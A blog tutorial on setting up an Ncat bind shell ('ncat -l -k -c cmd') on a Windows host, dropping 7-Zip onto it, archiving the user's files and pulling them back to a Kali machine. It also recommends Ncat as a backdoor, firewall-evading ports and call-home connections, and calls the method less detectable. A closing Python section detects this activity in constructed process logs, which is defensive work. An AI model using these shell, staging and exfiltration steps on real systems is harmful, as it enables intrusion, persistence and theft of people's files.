How to use Ncat and 7-Zip Command Line Version to Easily Transfer Multiple Files and Folders from a Remote Windows Host.

Ncat is an updated version of Netcat, often referred to as a “network swiss army knife”, that provides multiple useful functions on remote networks, one of which is file transfer from host to host. The file transfer feature in Ncat, while useful, is not very robust when it comes to transferring multiple files, specifically from a remote Windows host. Thankfully we can combine Ncat with one of my other favorite utilities, 7-Zip Command Line Version.

The Plan:

Copy 7-Zip to a remote Windows host via Ncat from your Linux host. Use the 7-Zip command line to zip multiple files and folders into a single zip file on the remote host. Transfer the zip file back to your Linux host. Unzip your bounty. Smile at a job well done.

The Requirements:

Linux with Ncat – I used Kali for this demo
Ncat-Portable Beta
7-Zip Command Line Version for Windows
A Windows remote host – I used Win 7 for this demo

The Disclaimer:

This tutorial requires a remote host with Ncat running in listener mode and shoveling a shell back to you. How you get Ncat on the remote host and up and running with the commands I provide below is up to you. As always, remember to only break into machines that you own or that someone is allowing you to pwn. I am not suggesting that you should use this file transfer method for nefarious purposes, but Ncat makes a great back door for maintaining access. Remote access to Ncat can be assigned to any of the popular firewall-ignored ports like 80 or 443. In addition, you can use certain switches within Ncat to call home to an external public IP address, thus bypassing the typical corporate firewall policy of considering all inside-out traffic as safe. These features of Ncat are outside the scope of this article, though they may be discussed in a future tutorial. Lastly, 7-Zip Command Line Version does not require an actual install on the remote Windows host and can be executed *surprise* via the command line, making the process of zipping up files on the remote host for transfer even less detectable.

The Steps:

1. As I mentioned above, you will need to drop the ncat.exe file you downloaded into a folder of your choice on the remote Windows host. I dropped my Ncat file into the root directory of the user I wanted to copy files from for sheer usability. Once you have the file copied, run the ncat -l -k -c cmd command in the command prompt of the remote Windows host. The -l switch sets the machine as a listener, the -k switch forces the Windows host to keep listening even if your Linux host closes the session, and the -c cmd switch shovels a shell back to any connecting host. You could add -p port-number to specify a common port number in an attempt to evade a firewall’s security if you are connecting remotely to a host on the DMZ, but in my case the remote Windows host is on the local network. From here on out, all access to the remote Windows machine will be via Ncat on your local Linux host.

2. On your Linux machine run the command ncat remote-host-ip. I will be targeting a host at 192.168.56.101 and will use this IP address in place of remote-host-ip from now on. Note: if you opted to use an alternate port on the remote Windows machine, the command you enter will look like ncat 192.168.56.101 80, with the port (in this case 80) listed last.

3. Once the command is executed and a connection established, you will be presented with a very familiar looking command prompt within your own Linux terminal.

4. Now we will need to copy 7-Zip over to the target Windows host. To do so we will open another Ncat session on the remote Windows host by entering the ncat -l -p 8080 > 7za.exe command into your newly acquired shell on your Linux machine. This prepares the remote Windows host to receive the 7-Zip command line tool. Make sure to specify a different port than the original session to avoid any confusion on Ncat’s part as to which session to transfer the file over.

5. Open an additional terminal session on your Linux host and connect to the newly created listener on the Windows host by entering the ncat --send-only 192.168.56.101 8080 < 7za.exe command. After the file transfer is complete this session to the remote Windows host terminates immediately, but the original remains.

6. Now we will use the 7-Zip command line to zip up the target files and folders on the remote Windows host that we want to transfer back to our Linux host. I will be issuing these commands on my Linux host in the original terminal window I used to gain shell access to the remote Windows host. I will start by zipping up all of the txt files I found in the user’s root directory by issuing the 7za a -tzip backup.zip *.txt command. Here 7za invokes the 7-Zip executable, a adds (archives) files to the target zip file, -tzip specifies a .zip file, backup.zip creates or specifies the target .zip file, and lastly *.txt tells 7-Zip to zip all of the .txt files in the current directory.

7. Next I want to copy some files off of the HAT user’s desktop, so I cd to the Desktop folder and issue a dir command to list all of the files contained within.

8. You can invoke the 7za command from any folder as long as you specify the original location of the 7za executable. Additionally, you can tell 7-Zip to add files to your original zip by providing the exact path to the existing zip. Note that I can also specify a single file by including the file name and extension at the end of the 7za command string.

9. The last item I want to grab is the folder called folder01 and all of its contents. Specifying a folder works in exactly the same way as specifying a file: simply enter its exact name at the end of the command string, minus the extension of course.

10. To transfer the zip file you just created back to the Linux host, we will remotely set up another Ncat listener on the remote Windows host via the shell access we gained earlier from our Linux host. This time we will be sending a file, not receiving one. The command used is ncat -l -p 8080 --send-only < backup.zip. Note that I was able to use port 8080 again because the previous Ncat session on that port had already terminated.

11. On the Linux host we will need to open another terminal to receive the zip file on port 8080 by issuing the ncat 192.168.56.101 8080 > backup.zip command.

12. Once the transfer is complete you can use the ls command to verify that the zip file transferred correctly.

13. To claim your bounty, simply issue the unzip backup.zip command in the terminal.

14. Using the ls command again, we can now see our extracted files.
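Seen from the Windows host’s side, the whole sequence above leaves a distinctive trail in process-creation telemetry: an ncat.exe listener with -c (or its -e/--exec sibling), further ncat.exe listeners on an extra port, and 7za.exe adding files to an archive. The following added example (mine, not part of the original tutorial) runs simple detection rules over constructed sample records in a hypothetical timestamp|host|user|image|command line format and correlates the listener and archiving activity per user.

```python
import re

# Constructed sample process-creation records (not real telemetry), one per line:
# timestamp|host|user|image|command line. Shell redirects such as "> 7za.exe"
# are consumed by cmd.exe and do not appear in the child's command line.
SAMPLE_LOG = """\
2014-05-02T10:01:12|WIN7-HAT|HAT|C:\\Users\\HAT\\ncat.exe|ncat -l -k -c cmd
2014-05-02T10:04:40|WIN7-HAT|HAT|C:\\Windows\\System32\\cmd.exe|cmd
2014-05-02T10:05:03|WIN7-HAT|HAT|C:\\Users\\HAT\\ncat.exe|ncat -l -p 8080
2014-05-02T10:07:55|WIN7-HAT|HAT|C:\\Users\\HAT\\7za.exe|7za a -tzip backup.zip *.txt
2014-05-02T10:11:02|WIN7-HAT|HAT|C:\\Users\\HAT\\ncat.exe|ncat -l -p 8080 --send-only
2014-05-02T10:15:00|WIN7-HAT|HAT|C:\\Program Files\\7-Zip\\7z.exe|7z x installer.zip
"""

NCAT_IMAGE = re.compile(r"\\(ncat|nc)\.exe$", re.IGNORECASE)
SEVENZIP_IMAGE = re.compile(r"\\7za?\.exe$", re.IGNORECASE)

def parse_record(line):
    ts, host, user, image, cmdline = line.split("|", 4)
    return {"ts": ts, "host": host, "user": user, "image": image, "argv": cmdline.split()}

def classify(rec):
    """Return (severity, reason) for one record, or None when nothing stands out."""
    argv = rec["argv"]
    if NCAT_IMAGE.search(rec["image"]) and "-l" in argv:
        port = argv[argv.index("-p") + 1] if "-p" in argv and argv[-1] != "-p" else "default"
        if "-c" in argv or "-e" in argv:      # -c cmd: listener hands a shell to any client
            return ("high", f"ncat listener executing a program on port {port}")
        if "--send-only" in argv:              # listener that only pushes a file out
            return ("medium", f"ncat listener serving a file out on port {port}")
        return ("medium", f"ncat listener on port {port} (possible inbound file drop)")
    if SEVENZIP_IMAGE.search(rec["image"]) and len(argv) > 1 and argv[1] == "a":
        return ("low", "7-Zip adding files to an archive")
    return None

def analyze(log):
    """Run classify over every record; returns (ts, user, severity, reason) tuples."""
    findings = []
    for line in log.splitlines():
        rec = parse_record(line)
        hit = classify(rec)
        if hit:
            findings.append((rec["ts"], rec["user"], *hit))
    return findings

def staged_exfil_users(findings):
    """Users seen both running a ncat listener and building an archive (the tutorial's sequence)."""
    listeners = {u for _, u, _, reason in findings if reason.startswith("ncat listener")}
    archivers = {u for _, u, _, reason in findings if reason.startswith("7-Zip")}
    return listeners & archivers
```

On the sample, the bind-shell listener is rated high on its own, while the two port-8080 listeners and the 7za archive creation are individually modest but together point at one user staging files for transfer.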

I hope you find this tutorial useful in your future networking adventures! To receive updates each time we release a new article, feel free to follow us on Twitter via @HackAndTinker.

-Philip Straatsma
